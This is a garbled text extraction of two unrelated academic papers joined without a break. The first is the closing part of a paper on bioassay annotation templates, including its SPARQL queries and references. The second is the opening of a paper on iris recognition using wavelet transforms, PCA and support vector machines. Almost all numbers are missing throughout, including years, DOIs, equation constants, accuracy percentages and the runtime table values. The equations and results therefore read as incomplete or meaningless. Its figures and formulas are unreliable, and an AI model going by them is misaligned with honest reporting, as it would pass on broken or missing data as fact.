percent_response pubchem_activity_outcome = (or active) if pubchem_activity_score > , otherwise the pubchem_activity_outcome = (or inactive). (a) (b) figure example of an assay partially suited for annotation with the cat. (a) text from description in pubchem assay id : yellow = information captured in cat, pink= information added as ‘literal’ values (i.e., too specific to exist as a bao entry, but deemed valuable), green = information not captured but possible for a future version (e.g., controls, labels of target and ligand, assay quality data (z′)), red = information beyond the scope of bao (technical details). (b) cat values assigned in the bioassay schema editor capture key parameters of the assay yet do not capture the complexity of the assay articulated in the single sentence (arrow): “a flow cytometry protein interaction assay to screen for compounds that compete with rna binding to grk .” clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ with several descriptive fields that are essentially plain text, and which are populated by contributors during the upload process, or in some cases by an import script transferring data from other sources. while many of the entries contain a significant amount of detail, the phrasing style and level of detail varies considerably, often erring on the side of too little or too much information about the assay protocol. nonetheless, the pubchem assay collection represents one of the best and most convenient sources of data for annotation purposes, and for this reason we have added a feature to the bateditor that explicitly searches for pubchem records, as shown in fig. . the dialog box allows the user to type in a pubchem assay id number, or to hit the button labelled random, which picks an arbitrary assay from the entire collection, and fills in the corresponding text and uri of origin. while a large proportion of assays loaded into pubchem contain only sparse tags about the data source, or the abstract of the corresponding publication, there are a significant number of records that contain lengthy descriptions of the assay. the dialog box provides an opportunity for the user to tidy up the text (e.g. removing irrelevant content) prior to importing it into the schema. the content is then added to the list of assays being annotated within the schema model, whereby the origin is recorded as a link to the assay, and the text is associated using the hasparagraph predicate. once the text is augmented with annotations using the current template, it becomes a useful entry for training data. this is one of our main strategies for generating a corpus of data for machine-learning purposes, which will ultimately find its way into a user friendly eln for bioassay annotation. analysis because the data model we describe is based on semantic web triples, and the file format that is used by the bioassay schema editor is made up of triples (in turtle format), it means that any templates and assay annotations can be loaded directly into a triple store database, and queried using sparql queries. content can be hosted on private servers for local use, or it can be exposed to the greater web of connected data. supplementary information describes a configuration script for the open source apache fuseki jena server which can be used to load the bao, its related ontologies, and some number of files saved with the bioassay schema editor, which can then be served up as read-only content. once the content is available via a sparql endpoint, there are a number of boilerplate queries that can be used to extract summary and specific information. fetching a list of all bioassay templates can be accomplished using the following query: prefix bat: <http://www.bioassayontology.org/bat#> prefix rdfs: <http://www.w .org/ / /rdf-schema#> select ?template ?label ?descr where { ?template a bat:bioassaytemplate ; rdfs:label ?label . optional {?template bat:hasdescription ?descr .} } clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/ the above query identifies any resource that is tagged as having the bat type. obtaining information about the assignments that are associated with a template can be done by looking for resources of type group that are associated with it. obtaining figure dialog box for random lookup of assays from pubchem. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ a summary list of assignments that are attached to the top level (i.e. not within a subgroup) can be accomplished with a query similar to the following (using the same prefixes as above) which explicitly references the cat: select ?assn ?label ?descr ?property ?numvalues { <http://www.bioassayontology.org/bas#commonassaytemplate> bat:hasassignment ?assn . ?assn a bat:assignment ; rdfs:label ?label ; bat:hasproperty ?property . optional {?assn bat:hasdescription ?descr .} { select ?assn (count(?value) as ?numvalues) where { ?assn bat:hasvalue ?value . } group by ?assn } } order by ?label similarly, assignments with one level of nesting can be obtained with a slightly longer query, which explicitly inserts a subgroup in between the template and assignment: select ?group ?glabel ?assn ?label ?descr ?property ?numvalues { <http://www.bioassayontology.org/bas#commonassaytemplate> bat:hasgroup ?group . ?group a bat:group ; rdfs:label ?glabel ; bat:hasassignment ?assn . ?assn a bat:assignment ; rdfs:label ?label ; bat:hasproperty ?property . { select ?assn (count(?value) as ?numvalues) where { ?assn bat :hasvalue ?value . } group by ?assn } } order by ?glabel ?label clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ to query for information about the prescribed values for assignment (in this case the bioassay assignment from the cat), the following query can be used: select ?property ?value ?label { <http://www.bioassayontology.org/bas#bioassay> bat:hasproperty ?property ; bat:hasvalue [ bat:mapsto ?value ; rdfs:label ?label ] . } the query specifically pulls out the property field, which is typically a link into the bao property terms, and the value field, which is typically a link into the bao classes. pursuing either of these resources provides a wealth of implicit information, partly from the hierarchical nature of the bao terms, and the unlimited opportunities for these terms to be linked to other semantic resources. to obtain a list of assays that have been annotated using one of the templates, the following query can be used: select ?assay ?label ?descr ?template where { ?assay a bat:bioassaydescription ; rdfs:label ?label ; bat:usestemplate ?template . optional {?assay bat:hasdescription ?descr .} } obtaining all of the annotations for such an assay can be done with: select ?assn ?label ?property ?value ?literal ?group where { <http://www.bioassayontology.org/bas#exampleassay> bat:hasannotation ?annot . ?annot bat:isassignment ?assn ; rdfs:label ?label ; bat:hasproperty ?property . optional {?annot bat:hasvalue ?value} optional {?annot bat:hasliteral ?literal} ?group a bat:group ; bat:hasassignment ?assn . } clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ because annotations are directly attached to an assay description, hierarchical information about the nature of the assignment can be obtained by further investigating the template definition of the assignment (?assn) or either of the linked bao terms (?property and ?value). conclusion we have developed a data model and interactive tool that can be used to narrow the degrees of freedom from the bao and its linked dependencies. this has been done in order to facilitate content creation activities, so that semantic annotation of assay protocols can be carried out by a domain expert with no corresponding expertise with the underlying ontology. we have provided a proof of concept tool that creates a user interface based on the template data model, and made this available to the community as open source. the data model that we have created follows a simplistic pattern, where elementary facts can be asserted. by leveraging the implied value of the underlying ontology, a small collection of a dozen or so such annotations provides a significant amount of machine-readable context about the assay. while insufficient to completely define an assay protocol experiment, this stands in contrast to the standard practice of providing essentially zero machine-readable information (i.e. plain english text with quasi-standardized jargon). we have made available the cat which was designed by biologists with the objective of leveraging the bao to provide the largest amount of useful, relevant, machine-readable information with the fewest number of additional data points needing to be captured by the originating scientist. the cat is expected to be useful for a wide variety of sorting, filtering, and data aggregating tasks that drug discovery scientists need to be able to carry out on a large scale, but currently cannot due to the absence of machine- readable annotations. the cat prioritizes assignments that biologists consider most central to describing their assays and reporting assay results. annotations for these assignments will enable biologists to ask complex queries. for example, one could ask if there are systematic differences in cell-based versus biochemical-based assays for a certain target class, such as kinases. one could determine if a certain assay set-up, such as -well plates using a spectrophotometer were likely to have a higher hit rate. similarly, one could identify if a certain compound or class of compounds is active in multiple assays, and if those assays assess similar biological processes or if the activity is likely to be an artifact. by focusing on assignments out of more than a hundred options available in the bao, the cat is meant to impose a minimal burden for annotating scientists. our goal is to make annotating assays simple and easy so that the practice may be generally adopted. templates are malleable and scientists can easily include other assignments. one critical type of information that is not included in the current framework is protocol steps, which would be essential for directly comparing two assays. in the future, it would be useful if this information were machine-readable. however, semantic technology using a simplistic data model like the bat cannot capture sequences of information. capturing procedural or protocol steps would require the development of a clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/ http://dx.doi.org/ . /peerj-cs. more complex data model. under the current system, we imagine that queries using annotations from the cat will allow scientists to hone in on similar assays, but for the moment, experts will still need to read the full assay descriptions to make decisions about combining different assays’ data sets. we have carried out this work in the context of a much larger scope, which is to provide scientists with tools to easily annotate bioassays and other related experiments in a way that is complete and machine-readable. given that the standard industry practice does not involve adding any machine readable data to assay protocols, and that there are currently no widely available tools to do so with a user experience that is sufficiently painless for mass adoption, we have taken an incremental approach. this additional work has been done in order that we can continue with our previous work that was focused on using machine learning techniques to accelerate manual assignment of assays (williams et al., ). our immediate follow-up goals are to make use of the cat to gather a large corpus of training data, both from active users of cdd vault, and from existing repositories such as pubchem. this training data will be used to ensure that our enterprise eln tools will be supported by machine learning technology as soon as they are unveiled. we are also pursuing options for extending the bat data model so that it is capable of capturing more sophisticated information about assays, e.g. linking to other ontologies to cover more types of assays; adding terminology for capturing quantities; addition of indefinite numbers of preparation steps; dependent assignment types, etc. one critical step when we enable connecting with other ontologies will be the ability to link the ‘target’ to a unique identifier such as geneid or uniprotid. each unique target identifier can be associated with a rich array of corresponding go terms, of which a subset are mapped into the default selection of bao classes. this will enable comparison of assays based on specific targets and related biological processes or molecular functions. while our first objective is horizontal scaling, i.e. ensuring that all assay protocols have semantic annotations that make a large portion of the content machine-readable, pursuing vertical scaling is also of great interest, i.e. making it possible for the semantic annotations to replace the need for use of english text (soldatova et al., ). this brings about some exciting possibilities beyond just improvement of searching and matching, such as uploading protocols to robotic assay machinery, or making the publication process multi-lingual, thus alleviating a considerable burden to non-native english speakers. pursuing this goal will require significant additions to the bao itself, as well as making increased use of borrowed terms from other ontologies. the technology that we have described in this article has been created for the purpose of improving the electronic lab notebook (eln) technology that is offered by collaborative drug discovery, inc. (cdd), and we have begun work on a web- based interface for using templates such as the cat for annotating assay protocols. we have disclosed all of the underlying methods, data and open source code because we welcome participation by anyone and everyone. while cdd is a privately held for-profit company, it is our firm belief that improvement to this particular aspect of scientific research is a positive sum game, and we have more to gain by sharing than by keeping our technology entirely proprietary. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / a preliminary version of the web inter- face can be found at http:// bioassayexpress.com. at the time of writing this service is in an early pre- alpha phase, but will be updated as the project progresses. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. http://bioassayexpress.com http://bioassayexpress.com https://peerj.com/ http://dx.doi.org/ . /peerj-cs. supporting materials the bioassay schema editor is publicly available from github (https://github.com/cdd/ bioassay-template). the source code for the application is available under the terms of the gnu public license (gpl) v , which requires that derived works must also be similarly open. the underlying semantic data model for the template and assay annotation, as well as the cat, are public domain: they are not copyrighted, and no restrictions are placed on their use. the bao is available from the corresponding site (http://bioassayontology.org/bioassayontology) under the creative commons attribution license v . additional information and declarations funding this work was funded in part from the nih ncats phase sbir grant # r tr - “simplifying encoding of bioassays to accelerate drug discovery” as described on https://projectreporter.nih.gov/reporter.cfm. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: nih ncats phase sbir: r tr - . competing interests all authors are employees of collaborative drug discovery, inc. author contributions � alex m. clark conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � nadia k. litterman conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � janice e. kranz conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � peter gund analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. � kellan gregory contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. � barry a. bunin contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/cdd/bioassay-template https://github.com/cdd/bioassay-template http://bioassayontology.org/bioassayontology https://peerj.com/ http://dx.doi.org/ . /peerj-cs. data deposition the following information was supplied regarding data availability: github: https://github.com/cdd/bioassay-template. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references abeyruwan s, vempati ud, küçük h, visser u, koleti a, mir a, sakurai k, chung c, bittker j, clemons p, brudz s, siripala a, morales a, romacker m, twomey d, bureeva s, lemmon v, schürer sc. . evolving bioassay ontology (bao): modularization, integration and applications. journal of biomedical semantics ( ):s doi . / - - -s -s . bolton e. . reporting biological assay screening results for maximum impact. drug discovery today: technologies : – doi . /j.ddtec. . . . clark am, bunin ba, litterman nk, schürer sc, visser u. . fast and accurate semantic annotation of bioassays exploiting a hybrid of machine learning and user confirmation. peerj :e doi . /peerj. . clark am, williams aj, ekins s. . machines first, humans second: on the importance of algorithmic interpretation of open chemistry data. journal of cheminformatics ( ): doi . /s - - - . de souza a, bittker ja, lahr dl, brudz s, chatwin s, oprea ti, waller a, yang jj, southall n, guha r, schürer sc, vempati ud, southern mr, dawson es, clemons pa, chung tdy. . an overview of the challenges in designing, integrating, and delivering bard: a public chemical-biology resource and query portal for multiple organizations, locations, and disciplines. journal of biomedical screening ( ): – doi . / . ecker gf, williams-jones b. . editorial: open innovation in drug discovery. molecular informatics ( ): – doi . /minf. . gaulton a, bellis lj, bento ap, chambers j, davies m, hersey a, light y, mcglinchey s, michalovich d, al-lazikani b, overington jp. . chembl: a large-scale bioactivity database for drug discovery. nucleic acids research (database issue):d –d doi . /nar/gkr . helal ky, maciejewski m, gregori-puigjane e, glick m, wassermann am. . public domain hts fingerprints: design and evaluation of compound bioactivity profiles from pubchem’s bioassay repository. journal of chemical information and modeling ( ): – doi . /acs.jcim. b . hersey a, senger s, overington jp. . open data for drug discovery: learning from the biological community. future medicinal chemistry ( ): – doi . /fmc. . . kim s, thiessen pa, bolton ee, chen j, fu g, gindulyte a, han l, he j, he s, shoemaker ba, wang j, yu b, zhang j, bryant sh. . pubchem substance and compound databases. nucleic acids research (d ):d –d doi . /nar/gkv . schürer sc, vempati u, smith r, southern m, lemmon v. . bioassay ontology annotations facilitate cross-analysis of diverse high-throughput screening data sets. journal of biomolecular screening ( ): – doi . / . clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/cdd/bioassay-template http://dx.doi.org/ . /peerj-cs. #supplementalnformation http://dx.doi.org/ . /peerj-cs. #supplementalnformation http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /j.ddtec. . . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /minf. http://dx.doi.org/ . /nar/gkr http://dx.doi.org/ . /acs.jcim. b http://dx.doi.org/ . /fmc. . http://dx.doi.org/ . /nar/gkv http://dx.doi.org/ . / https://peerj.com/ http://dx.doi.org/ . /peerj-cs. soldatova ln, nadis d, king rd, basu ps, haddi e, baumié v, saunders nj, marwan w, rudkin bb. . exact : the semantics of biomedical protocols. bmc bioinformatics (suppl ):s doi . / - - -s -s . the gene ontology consortium. . gene ontology consortium: going forward. nucleic acids research (database issue):d –d . vempati ud, przydzial mj, chung c, abeyruwan s, mir a, sakurai k, visser u, lemmon vp, schürer sc. . formalization, annotation and analysis of diverse drug and probe screening assay datasets using the bioassay ontology (bao). plos one ( ):e doi . /journal.pone. . wang y, suzek t, zhang j, wang j, he s, cheng t, shoemaker ba, gindulyte a, bryant sh. . pubchem bioassay: update. nucleic acids research (database issue): d –d doi . /nar/gkt . williams aj, harland l, groth p, pettifer s, chichester c, willighagen el, evelo ct, blomberg n, ecker g, goble c, mons b. . open phacts: semantic interoperability for drug discovery. drug discovery today ( – ): – doi . /j.drudis. . . . williams aj, wilbanks j, ekins s. . why open drug discovery needs four simple rules for licensing data and models. plos computational biology ( ):e doi . /journal.pcbi. . willighagen el, waagmeester a, spjuth o, ansell p, williams aj, tkachenko v, hastings j, chen b, wild dj. . the chembl database as linked open data. journal of cheminformatics ( ): doi . / - - - . clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /nar/gkt http://dx.doi.org/ . /j.drudis. . . http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . / - - - https://peerj.com/ http://dx.doi.org/ . /peerj-cs. bioassay templates for the semantic web introduction methods results conclusion supporting materials references submitted november accepted march published april corresponding author mohammad ali moni, mohammad.moni@sydney.edu.au academic editor pablo arbelaez additional information and declarations can be found on page doi . /peerj-cs. copyright rana et al. distributed under creative commons cc-by . open access a fast iris recognition system through optimum feature extraction humayan kabir rana , md. shafiul azam , mst. rashida akhtar , julian m.w. quinn and mohammad ali moni , department of computer science and engineering, green university of bangladesh, dhaka, bangladesh department of computer science and engineering, pabna university of science and technology, pabna, bangladesh department of computer science and engineering, varendra university, rajshahi, bangladesh bone biology division, garvan institute of medical research, nsw, australia school of medical sciences, faculty of medicine and health, the university of sydney, sydney, australia abstract with an increasing demand for stringent security systems, automated identification of individuals based on biometric methods has been a major focus of research and development over the last decade. biometric recognition analyses unique physiological traits or behavioral characteristics, such as an iris, face, retina, voice, fingerprint, hand geometry, keystrokes or gait. the iris has a complex and unique structure that remains stable over a person’s lifetime, features that have led to its increasing interest in its use for biometric recognition. in this study, we proposed a technique incorporating principal component analysis (pca) based on discrete wavelet transformation (dwt) for the extraction of the optimum features of an iris and reducing the runtime needed for iris template classification. the idea of using dwt behind pca is to reduce the resolution of the iris template. dwt converts an iris image into four frequency sub-bands. one frequency sub-band instead of four has been used for further feature extraction by using pca. our experimental evaluation demonstrates the efficient performance of the proposed technique. subjects human–computer interaction, computer vision, security and privacy keywords biometrics, iris recognition, pca, dwt, gabor filter, hough transformation, daugman’s rubber sheet model introduction biometric recognition refers to the study of identifying persons based on their unique physical traits or behavioral characteristics (umer, dhara & chanda, ). physical characteristics commonly include an iris, face, fingerprint, retina, vein, voice or hand geometry, while behavioral characteristics may include handwriting, walking gait, signature, and typing keystrokes. to be useful, a biometric requires features that can be accurately analysed to provide unique, and stable information about a person that can be used reliably in authentication applications and many advances have been made in this area (naseem et al., ). the iris has easily accessible and unique features that are stable over the lifetime of an individual. for this reason, iris recognition technology has been widely studied in the field of information security. iris recognition systems can already be applied to identify individuals in controlled access and security zones, and could feasibly be how to cite this article rana hk, azam ms, akhtar mr, quinn jmw, moni ma. . a fast iris recognition system through optimum feature extraction. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:mohammad.moni@sydney.edu.au https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. figure the outer look of a human iris. the iris is a circular structure bounded by the sclera and pupil that controls the amount of light reaching the retina. full-size doi: . /peerjcs. /fig- used for verification of passengers at immigration, airports, stations, computer access at research organization, database access control in distributed systems etc. (galdi, nappi & dugelay, ). iris recognition systems can also be applied in the field of financial services such as banking services and credit card use, and such a system would not have the same vulnerabilities as passwords and numbers. iris recognition systems are being trialled in many countries for national id cards, immigration, national border control, airline crews, airport staffs, and missing children identification etc. (galdi, nappi & dugelay, ). while there are still some concerns about using iris-based recognition in mass consumer applications due to iris data capturing issues, it is widely believed that, in time, the technology is likely to find its way into common use (nabti & bouridane, ). an iris is a round contractile membrane of the eye, between sclera and pupil. it begins to form during embryo gestation, being fully formed at around eight months. the uniqueness of the iris patterns comes from the richness of the texture details arising from the crypts, radial furrows, filaments, pigment frills, flecks, stripes and arching ligaments. these give rise to complex and irregular textures that are so randomly distributed as to make the human iris one of the most reliable biometric characteristics. the iris is bounded by the pupil at the inner boundary and the sclera at its outer boundary. these inner and outer boundaries are circular in shape and easily accessible but can be partially blocked by the upper and lower eyelids and eyelashes (galdi, nappi & dugelay, ). figure shows a view of a typical human iris. in this paper, feature extraction techniques are the main focus. indeed, the selection of optimal feature subsets has become a crucial issue in the field of iris recognition. to improve feature extraction, we propose that an approach combining principal component analysis (pca) and discrete wavelet transformation (dwt) will extract the key features of an iris and thereby reduce image resolution and in turn the runtime of the classification or analysis that is required for the resulting iris templates. rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure diagram of iris recognition system. here, hough transform, daugman’s rubber-sheet model, pca + dwt and svm are used for segmentation, normalization, feature extraction and classification re- spectively. full-size doi: . /peerjcs. /fig- methodology iris recognition processing generally consists of the following steps: (i) image acquisition (ii) iris segmentation (iii) normalization (iv) feature extraction and (v) classification. in our approach presented here, segmentation was achieved using the hough transform for localizing the iris and pupil regions. the segmented iris region was normalized to a rectangular block with fixed polar dimensions using daugman’s rubber sheet model. a combined pca and dwt were applied on a fixed size normalized iris for feature extraction. the support vector machine was used for classification the similarity between the iris templates. figure shows the system processes that we used for iris recognition. image acquisition the first step in iris recognition is image acquisition, i.e., the capture of a sequence of high-quality iris images from the subject. these images should clearly show the entire eye, but particularly the iris and pupil. preprocessing operations may be applied to the captured images in order to enhance their quality and provide sufficient resolution and sharpness (frucci et al., ). in this work, the casia-iris v database has been used instead of actual captured eye images (tieniu tan, ). casia-irisv is an extension of casia-irisv , and contains six subsets that include three subsets (from casia-irisv ), namely casia-iris-interval, casia-iris-lamp, and casia-iris-twins. the three new subsets added to casia-irisv are casia-iris-distance, casia-iris-syn and casia-iris- thousand respectively. center for biometrics and security research (cbsr) captured images of casia-iris-interval using their self-developed iris camera. iris images of casia- iris-interval is good for studying the texture features of iris. iris images of casia-iris- lamp were captured with a hand-held iris sensor, and these images are well-suited for finding problems of non-linear iris normalization and robust feature representation. cbsr rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure iris segmentation using hough transformation. (a) original iris image; (b) edge mapped iris using first derivative or gradient; (c) edge detected iris image. full-size doi: . /peerjcs. /fig- collected iris images of casia-iris-twins during annual twins festival in beijing. casia- iris-twins data-sets are suitable for studying the similarities and dissimilarities between iris images of twins. casia-iris-distance images were captured by employing long-range multi-modal biometric image acquisition and recognition system. casia-iris-thousand database contains , iris images, which were captured using ikemb- camera. casia-iris-thousand images are suitable for experimenting the uniqueness of iris features and developing novel iris classification methods. casia-irisv contains a total , iris images. this includes samples from more than , genuine subjects and , virtual subjects. all iris images are -bit grey-level image and the file format is jpeg (tieniu tan, ). iris segmentation iris segmentation was used to isolate the actual iris region from a digital eye image. the iris region, (fig. ) can be bounded by two circles pertaining to the pupil (inner boundary) and sclera (outer boundary). hough transformation was employed to locate the circular iris region. hough transformation the hough transformation is a procedure generally used to compute the parameters of the geometric objects such as lines and circles in an image. for detecting the center coordinates and radius of the iris and pupil regions, the circular hough transform can be used. this technique generally uses a voting procedure to find shapes of the objects within the classes available. the hough segmentation algorithm firstly creates an edge map by computing the gradients or first derivatives of intensity values in an eye image as shown in fig. . for each edge pixel in the edge map, the surrounding points on the circle at different radii are taken, and votes are cast for finding the maximum values that constitute the parameters of circles in the hough space (verma et al., a). the center coordinates and the radius can be found using the following equation: x c +y c −r = ( ) in the hough space, the maximum point corresponds to the center coordinates (xc,yc) and the radius ‘r’ of the circle is given by the edge points. rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure daugman’s rubber-sheet model used for iris normalization. the circular shape represents segmented iris region and the rectangular shape represents normalized iris which is equivalent to the seg- mented iris region. full-size doi: . /peerjcs. /fig- when performing the edge detection, we have considered derivatives/gradients in the vertical direction to detect the iris-sclera boundary to decrease the effect of the eyelids which are horizontally aligned (verma et al., a). the vertical gradients are taken for locating the iris boundary and to reduce the influence of the eyelids. when performing circular hough transformation, not all of the edge pixels that define the circle are required for successful localization. not only does this make circle localization more accurate, but it also makes it more efficient, since there are fewer edge points to cast votes in the hough space (verma et al., a). normalization once the circular iris region is successfully segmented from an eye image, normalization is applied on it to transform the segmented circular iris region into a fixed size rectangular shape. the normalization process produces an iris region that has fixed dimensions so that two photographs of the same iris taken under the different capturing environment will have the same characteristic features (verma et al., b). in this work, daugman’s rubber-sheet model was used to normalize iris image. daugman’s rubber-sheet model daugman’s rubber-sheet model is the most widely used method for iris normalization (daugman, ) which converts the circular iris region into a fixed sized rectangular block. using ( ), the model transforms every pixel in the circular iris into an equivalent position on the polar axes (r,θ) where r is the radial distance and θ is the rotated angle at the corresponding radius. the radial resolution describes the number of radial lines generated around the iris region while the angular resolution is the number of data points in the radial direction. i[x(r,θ),y(r,θ)]→ i(r,θ) ( ) the iris region is converted to a two-dimensional array. horizontal dimension represents the angular resolution, and the vertical dimension represents radial resolution, as shown in fig. . where i(x,y) corresponds to the iris region, (x,y) and (r,θ) are the cartesian and normalized polar coordinates, respectively. ranges of θ from to π and r from rp rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure iris template using one level dwt. dwt transforms normalized iris image into four- frequency sub-bands, namely ll, lh, hl and hh. full-size doi: . /peerjcs. /fig- to rl.x(r,θ) and y(r,θ) are defined as linear combinations of pupil boundary points (daugman, ). feature extraction feature extraction is the most important and critical part of the iris recognition system. feature extraction is a process of reducing the amount of data required to describe a large set of information present in an iris pattern. the successful recognition rate and reduction of classification time of two iris templates mostly depend on efficient feature extraction technique. proposed technique for feature extraction in this section, the proposed technique produces an iris template with reduced resolution and runtime for classifying the iris templates. to produce the template, firstly dwt has been applied to the normalized iris image. dwt transforms normalized iris image into four-frequency sub-bands, namely ll, lh, hl and hh, as shown in fig. . the frequency range can be represented as ll < lh < hl < hh (ma et al., ; yu-hsiang, ). the ll sub-band represents the feature or characteristics of the iris (acharya et al., ; moni & ali, ), so that this sub-band can be considered for further processing (acharya et al., ; zhao et al., ). figure shows that the resolution of the original normalized iris image is ( × ). after applying dwt on a normalized iris image the resolution of ll sub-band is ( × ). ll sub-band represents the lower resolution approximation iris with required feature or characteristics, as this sub-band has been used instead of the original normalized iris data for further processing using pca. as the resolution of the iris template has been reduced, so the runtime of the classification will be similarly reduced. pca has found the most discriminating information presented in ll sub-band to form feature matrix shown in fig. , and the resultant feature matrix has been passed into the classifier for recognition. the mathematical analysis of pca includes: . the mean of each vector is given in the equation: xm= n n∑ k= xk ( ) . the mean is subtracted from all of the vectors to produce a set of zero mean vectors is given in the equation: xz =xi−xm ( ) rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure iris template using pca based on the dwt. full-size doi: . /peerjcs. /fig- where xz is the zero mean vectors, xi is each element of the column vector, xm is the mean of each column vector. . the covariance matrix is computed using the equation: c =[xzt∗xz] ( ) . the eigenvectors and eigenvalues are computed using the equation: [c−γ i]e= ( ) where γ ’s are the eigenvalue and e’s are the eigenvectors. . each of an eigenvectors is multiplied with zero mean vectors xz to form the feature vector. the feature vector is given by the equation: fi=[xz]e ( ) classification classification is a process of measuring the similarity between two iris templates that have been generated in the feature extraction stage. this process gives a range of values during comparison of same iris templates and another range of values during the comparison of different iris templates generated from a different person’s eye (rana, azam & akhtar, ). this training can ultimately enable us to determine whether the two iris templates belong to the same or different persons. in this work, support vector machine was used to classify the iris images. support vector machine support vector machine (svm) performs pattern recognition based on the principle of structural risk minimization. svm is a binary classifier that optimally separates the two rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure svm with linear separable data. the svm finds the hyper-plane h (w.x+b= ) that differenti- ates the two classes of linear separable data. full-size doi: . /peerjcs. /fig- classes of data. there are two major aspects of developing svm as a classifier. the first aspect is to determine the optimal hyperplane in between two separate classes of data and the another aspect is to transform the non-linearly separable classification problem into linearly separable problem (czajka et al., ). figure shows an example of linearly separable classification problem. let x is a set of input feature vector and y is the class label. the input feature vectors and the class label can be represented as {xi,yi}, where i= , , ..., n and y =± . the separating hyperplane can be represented as follows, w.x+b= ( ) which implies, yi(w.xi+b)≥ ;i= , ...n ( ) basically, {w,b} can have numerous possible values which create separating hyperplane. it is believed that points often lie between two data classes in such a way that there is always some margin in between them. svm maximizes this margin by considering it as a quadratic problem (barpanda et al., ). the svm can make two possible decisions during iris recognition; acceptance or rejection of a person. algorithm problem definition: the iris is a biometric characteristic that can be used to authenticate persons. this algorithm finds whether a person is authenticated or not using the iris. the objectives are: this algorithm recognizes a person using iris segmentation, normalization, dwt, pca and svm classifier is given in table . rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table general algorithm of our proposed iris recognition system. input: eye image output: recognition of a person (a) read the eye image. (b) iris segmentation using hough transformation. (c) iris normalization using daugman’s model. (d) the dwt is applied, and the ll sub-band is considered. (e) pca is applied on ll sub-band to form a feature vector. (f) classification time measurement started by using a clock function. (f) match/non-match decision is obtained using svm classifier. (g) classification time measurement end. table accuracy comparison of our proposed technique with others. sl. author method accuracy . mh hamd et al. pca % . sg firake et al. gabor filter . % . j poonia et al. gabor+pca . % . hk rana et al. our proposed . % experimental results and discussions in this section, the proposed technique has been evaluated in the casia iris database, and the results have been reported. iris images of individuals have been enrolled in our system database for training and other iris images for assessing the performance. intel core-i . gh processor, gb ram, windows- operating system and matlab a tools have been used as an experimental environment. in this study, we have developed an approach to reduce the runtime by keeping the accuracy as high as possible. the accuracy of our proposed technique is . % with far % and frr %, is shown in table , which is better than the other methods that are used for runtime comparison. hamd & ahmed ( ) proposed a technique to compare two feature extraction methods, pca and fourier descriptors (fd), in which circular hough transform, daugman’s rubber sheet model and the manhattan classifier were used for segmentation, normalization, and classification respectively. their average accuracy for pca was %. firake & mahajan ( ) proposed a technique to compare three feature extraction methods, gabor filter, pca and independent component analysis (ica), in which hough transform, daugman’s rubber sheet model and hamming distance were used for segmentation, normalization, and classification respectively. their average accuracy was . % for gabor filter. jyoti poonia ( ) observed the average accuracy . % for gabor filter + pca based feature extraction technique. we have mainly evaluated the time required for classification of our proposed feature extraction techniques, and found classification-time of our proposed technique is significantly better than others. the experimental results are shown in table and fig. . rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison of classification-time of our proposed technique with others. runtime for each feature extraction technique has been reported by employing iris templates. the mean and median of each feature extraction technique have been calculated by considering the runtime of eight attempts. sl. methods runtime of iris templates in second time per attempt mean median . . . . . . . . pca based feature extraction . . . . . . . . . . . gabor filter based feature extraction . . . . . . . 